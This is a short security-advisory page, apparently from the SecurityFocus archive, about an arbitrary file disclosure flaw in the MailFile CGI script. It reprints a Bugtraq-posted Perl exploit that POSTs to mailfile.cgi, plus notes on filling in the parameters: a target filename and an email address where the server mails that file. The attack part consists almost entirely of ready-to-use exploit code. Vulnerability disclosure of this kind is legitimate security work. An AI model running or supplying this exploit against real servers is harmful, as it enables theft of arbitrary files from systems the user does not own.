MailFile Arbitrary File Disclosure Vulnerability

This small exploit was included in the post to Bugtraq by Dirk Brockhausen <bro@brocon.com>:

--snip--

#!/usr/bin/perl

use HTTP::Request::Common;
use LWP::UserAgent;

$ua = LWP::UserAgent->new;
$res = $ua->request(POST 'http://domain/mailfile.cgi',
[real_name => 'value1',
email => 'value2',
filename => 'value3',
]);

--snip--

value3 = target filename
value2 = where to send the file to
value1 = username.. can be anything.


 

Privacy Statement
Copyright 2010, SecurityFocus